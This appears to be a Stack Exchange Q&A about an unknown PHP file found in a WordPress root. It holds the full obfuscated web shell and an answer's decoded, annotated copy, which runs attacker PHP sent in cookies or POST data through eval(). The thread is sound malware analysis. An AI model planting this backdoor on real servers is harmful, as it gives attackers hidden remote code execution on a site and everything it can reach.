
I found a new file in my WP root folder, and it contains this text:

<?php ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["jd\x67f\x6f\x77\x6a"]="\x64\x61\x74\x61\x5f\x6bey";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["c\x63\x78\x72\x6e\x73w\x72\x78\x68"]="\x64\x61\x74\x61";${"\x47\x4c\x4fB\x41L\x53"}["gljjdjxq\x74e"]="\x64a\x74\x61";$hdhravkt="d\x61\x74a";${"\x47\x4c\x4f\x42A\x4c\x53"}["o\x74\x7a\x71\x71l\x6a"]="\x76al\x75e";${"\x47L\x4f\x42\x41\x4cS"}["pvvl\x67\x63\x68"]="a\x75\x74\x68";${"\x47L\x4f\x42A\x4cS"}["m\x70\x71\x6e\x63if\x6b\x65mn"]="\x6b\x65y";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6d\x71\x65\x6fs\x70\x70\x62i"]="\x6a";${"\x47\x4cO\x42\x41LS"}["\x6b\x6db\x68i\x66\x62"]="\x69";${"\x47\x4c\x4fB\x41\x4cS"}["\x77mu\x70wx\x62\x65\x6am"]="\x6fut_\x64\x61\x74\x61";@ini_set("\x65rro\x72\x5f\x6c\x6fg",NULL);@ini_set("\x6c\x6fg\x5fer\x72\x6f\x72s",0);@ini_set("max\x5fexe\x63\x75t\x69\x6f\x6e\x5ft\x69\x6d\x65",0);${"G\x4cOB\x41L\x53"}["n\x6b\x6a\x70\x65\x76f\x6cy\x79"]="\x64\x61\x74\x61\x5f\x6b\x65\x79";$orxtlbuxdn="\x64\x61t\x61";@set_time_limit(0);if(!defined("P\x48\x50_\x45\x4fL")){define("P\x48P\x5f\x45OL","\n");}$cfusxjrfhr="va\x6cue";if(!defined("D\x49\x52ECT\x4f\x52\x59_SE\x50A\x52\x41\x54\x4fR")){define("DI\x52\x45\x43\x54\x4f\x52Y_S\x45\x50\x41RATO\x52","/");}${$orxtlbuxdn}=NULL;$scrxtpm="d\x61\x74\x61";${${"\x47\x4c\x4fB\x41L\x53"}["\x6ek\x6a\x70\x65vf\x6c\x79\x79"]}=NULL;$GLOBALS["\x61uth"]="4ef6\x33\x61\x62e-\x31\x61\x62d-\x34\x35\x61\x36-913d-6\x66\x62\x399\x36\x357\x65\x32\x34b";global$auth;${"G\x4cO\x42AL\x53"}["\x67\x71c\x71\x69\x61gtkd"]="\x61\x75\x74\x68";function 
sh_decrypt_phase($data,$key){$lougpr="i";${"G\x4c\x4fB\x41\x4c\x53"}["\x78\x79\x75\x6b\x73\x79\x6e\x6b\x73"]="\x64a\x74\x61";${${"G\x4cO\x42\x41\x4cS"}["w\x6d\x75p\x77\x78b\x65\x6a\x6d"]}="";for(${${"\x47LO\x42A\x4cS"}["\x6b\x6d\x62\x68\x69\x66\x62"]}=0;${$lougpr}<strlen(${${"\x47L\x4fBAL\x53"}["x\x79\x75\x6b\x73\x79\x6e\x6bs"]});){${"\x47\x4c\x4f\x42\x41LS"}["ni\x6dz\x78\x6c"]="\x6a";$jplufmtpaem="i";$dxzvtliuv="da\x74\x61";for(${${"\x47LO\x42ALS"}["\x6d\x71\x65\x6fs\x70p\x62\x69"]}=0;${${"\x47L\x4fB\x41\x4cS"}["m\x71\x65\x6f\x73\x70\x70bi"]}<strlen(${${"\x47\x4cOB\x41L\x53"}["\x6dpq\x6e\x63\x69\x66\x6b\x65\x6d\x6e"]})&&${${"GLO\x42\x41LS"}["k\x6d\x62\x68\x69\x66b"]}<strlen(${$dxzvtliuv});${${"G\x4c\x4f\x42AL\x53"}["\x6ei\x6d\x7a\x78\x6c"]}++,${$jplufmtpaem}++){${"\x47L\x4f\x42\x41\x4c\x53"}["wf\x6c\x79\x6eh\x75\x6c\x72\x72"]="\x6f\x75\x74_\x64\x61\x74\x61";${"\x47LO\x42\x41\x4cS"}["pcnb\x79\x71s\x63\x74\x61\x6f"]="\x64\x61\x74\x61";$kslqcnjzpl="j";${${"\x47\x4c\x4f\x42\x41LS"}["wf\x6c\x79\x6eh\x75l\x72\x72"]}.=chr(ord(${${"GLO\x42A\x4c\x53"}["\x70\x63\x6eb\x79q\x73c\x74a\x6f"]}[${${"\x47\x4cO\x42\x41\x4c\x53"}["\x6b\x6d\x62\x68i\x66b"]}])^ord(${${"\x47LO\x42A\x4c\x53"}["\x6dp\x71n\x63\x69\x66\x6b\x65\x6d\x6e"]}[${$kslqcnjzpl}]));}}return${${"\x47\x4c\x4f\x42\x41\x4cS"}["wmu\x70\x77\x78\x62\x65j\x6d"]};}function sh_decrypt($data,$key){$zhjqnlijbf="\x6b\x65\x79";$rmzkqwtkh="\x64\x61\x74a";global$auth;return sh_decrypt_phase(sh_decrypt_phase(${$rmzkqwtkh},${${"\x47\x4cO\x42\x41\x4c\x53"}["pv\x76\x6cg\x63\x68"]}),${$zhjqnlijbf});}foreach($_COOKIE 
as${${"\x47\x4cO\x42A\x4c\x53"}["\x6d\x70q\x6e\x63i\x66\x6b\x65m\x6e"]}=>${$cfusxjrfhr}){${"\x47L\x4f\x42\x41\x4cS"}["\x72\x72\x6fv\x74\x68\x66b\x77\x63"]="\x64a\x74\x61";$xlaknbhqsh="d\x61\x74\x61\x5f\x6b\x65\x79";${${"G\x4c\x4f\x42AL\x53"}["r\x72ovt\x68f\x62\x77\x63"]}=${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x6f\x74z\x71\x71\x6c\x6a"]};${$xlaknbhqsh}=${${"\x47\x4c\x4f\x42AL\x53"}["mp\x71n\x63i\x66k\x65\x6d\x6e"]};}if(!${$scrxtpm}){${"\x47L\x4f\x42AL\x53"}["a\x63\x69p\x66\x72\x69i"]="\x76\x61l\x75\x65";foreach($_POST as${${"\x47\x4cO\x42\x41\x4c\x53"}["\x6d\x70\x71\x6e\x63i\x66\x6b\x65m\x6e"]}=>${${"\x47\x4cOB\x41\x4cS"}["a\x63\x69p\x66\x72\x69i"]}){${"\x47L\x4fB\x41\x4c\x53"}["m\x67b\x70yu\x78\x61"]="\x64a\x74a\x5fk\x65\x79";${"G\x4cOBAL\x53"}["\x64r\x6awk\x67\x68g"]="ke\x79";${${"\x47\x4c\x4fB\x41\x4cS"}["cc\x78\x72\x6e\x73\x77rx\x68"]}=${${"\x47\x4cO\x42\x41LS"}["o\x74\x7a\x71q\x6cj"]};${${"\x47\x4c\x4fB\x41L\x53"}["\x6d\x67\x62\x70\x79\x75\x78\x61"]}=${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["dr\x6awk\x67\x68\x67"]};}}${${"\x47L\x4fB\x41\x4cS"}["\x63\x63\x78\x72\x6e\x73w\x72\x78\x68"]}=@unserialize(sh_decrypt(@base64_decode(${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x63\x63\x78\x72\x6esw\x72x\x68"]}),${${"G\x4c\x4f\x42A\x4c\x53"}["\x6a\x64\x67f\x6f\x77j"]}));if(isset(${${"\x47\x4c\x4f\x42\x41L\x53"}["g\x6c\x6aj\x64\x6a\x78\x71\x74\x65"]}["a\x6b"])&&${${"\x47\x4c\x4f\x42A\x4cS"}["\x67\x71cqi\x61gt\x6b\x64"]}==${$hdhravkt}["\x61k"]){$efxgmzy="\x64\x61\x74\x61";if(${${"G\x4cO\x42\x41\x4c\x53"}["\x63\x63xr\x6es\x77rx\x68"]}["\x61"]=="\x69"){${${"G\x4cOBA\x4c\x53"}["k\x6d\x62\x68\x69\x66\x62"]}=Array("\x70\x76"=>@phpversion(),"\x73\x76"=>"1\x2e0-\x31",);echo@serialize(${${"\x47\x4cO\x42A\x4c\x53"}["k\x6d\x62h\x69\x66b"]});}elseif(${$efxgmzy}["\x61"]=="e"){${"\x47\x4cO\x42\x41\x4c\x53"}["g\x6c\x6eew\x69\x6b\x61"]="\x64at\x61";eval(${${"G\x4c\x4f\x42A\x4cS"}["\x67\x6c\x6e\x65wi\x6b\x61"]}["d"]);}}
?>

What is this?

Joci93
    Whenever you find a PHP file on your webserver you didn't put there, you know you have a serious security problem. – Philipp Jul 03 '15 at 12:13
    @Philipp: or a colleague who finger-fumbled and scp'd to the wrong box. Granted not in this case. – Steve Jessop Jul 03 '15 at 23:39
    @Philipp - Whenever you find PHP on your webserver, you have a serious security problem. /snark – Fake Name Jul 04 '15 at 04:06
  • OP has not responded. I am guessing there is a lot of clean up to do. Hopefully it was just a shared server and only affected one account. – Jared Burrows Jul 05 '15 at 00:58
  • I object that this is too broad. IMHO this is a very valid and precise question. And the answer is really good and very precise, too. – Axel Beckert Sep 17 '18 at 18:35

1 Answer


It's a malicious web shell (a PHP backdoor that takes commands over HTTP). This is the decoded version:

<?php
// Silence the shell's own errors and lift the execution time limit, so a
// long-running payload neither times out nor (presumably) leaves anything in error_log.
@ini_set("error_log", NULL);
@ini_set("log_errors", 0);
@ini_set("max_execution_time", 0);
@set_time_limit(0);
$data = NULL;
$data_key = NULL;
// Hard-coded shared secret. It doubles as the first XOR key in sh_decrypt(),
// and commands whose "ak" field does not match it are silently ignored below.
$GLOBALS["auth"] = "4ef63abe-1abd-45a6-913d-6fb99657e24b";
global $auth;

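function sh_decrypt_phase($data, $key) {
    // One pass of repeating-key XOR over $data: the inner loop walks $key from its
    // start and stops at whichever end (key or data) comes first, the outer loop
    // then restarts the key. XOR is its own inverse, so this routine both encodes
    // and decodes. (The listing previously had a syntax error in the outer for(),
    // and carried a leftover obfuscation local "$jplufmtpaem"; both are fixed here.)
    // NOTE: with an empty $key the inner loop never advances $i and the outer loop
    // spins forever -- the sample disables the execution-time limit above.
    // Behaviour kept as in the original sample.
    $out_data = "";
    for ($i = 0; $i < strlen($data);) {
        for ($j = 0; $j < strlen($key) && $i < strlen($data); $j++, $i++) {
            $out_data .= chr(ord($data[$i]) ^ ord($key[$j]));
        }
    }
    return $out_data;
}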

function sh_decrypt($data, $key) {
    // Two XOR layers: first the hard-coded $auth token (the global set at the top
    // of the file), then the per-request $key (the cookie / POST parameter name).
    global $auth;
    $first_pass = sh_decrypt_phase($data, $auth);
    return sh_decrypt_phase($first_pass, $key);
}

// Command pickup: the payload is taken from the LAST cookie seen (cookie name =
// XOR key, cookie value = ciphertext). POST fields are used the same way only if
// no cookie supplied a truthy value. Neither channel typically appears in the web
// server's access log.
foreach($_COOKIE as $key => $value) {
    $data = $value;
    $data_key = $key;
}

// Truthiness test, not isset(): a cookie value of "" or "0" also falls through to POST.
if(!$data) {
    foreach($_POST as $key => $value) {
        $data = $value;
        $data_key = $key;
    }
}
// Decode pipeline: base64 -> XOR with $auth -> XOR with the parameter name -> unserialize.
// unserialize() on attacker-controlled bytes is dangerous in its own right (object
// injection), though moot next to the eval() below. Errors are @-silenced, so a
// malformed request just leaves $data === false and the checks below do nothing.
$data = @unserialize(sh_decrypt(@base64_decode( $data ) ,  $data_key ));

// Dispatch. Only two commands exist: "i" = fingerprint (PHP version plus the shell's
// own version string "1.0-1"), "e" = eval() arbitrary PHP from the "d" field.
// Anything else is ignored. The token check uses loose ==, so a serialized boolean
// true in "ak" compares equal to the non-empty $auth string and passes as well.
if (isset($data["ak"]) && $auth == $data["ak"]) {
    if ($data["a"] == "i") {
        $i = Array("pv" => @phpversion() , "sv" => "1.0-1" , );
        echo @serialize($i);
    }
    elseif ($data["a"] == "e") {
        // Remote code execution: $data["d"] is attacker-supplied PHP source.
        eval($data["d"]);
    }
}

?>

The `e` command ends in `eval($data["d"])`, which runs whatever PHP the attacker sends with each request – this is a general-purpose remote code execution backdoor, not a one-off payload. Commands arrive in a cookie or POST body, so they typically leave no trace in the web server's access log. Treat the site and every credential reachable from it (database, wp-config.php) as compromised, and find how the file got written in the first place rather than just deleting it.

Jens Erat
Tomasz Klim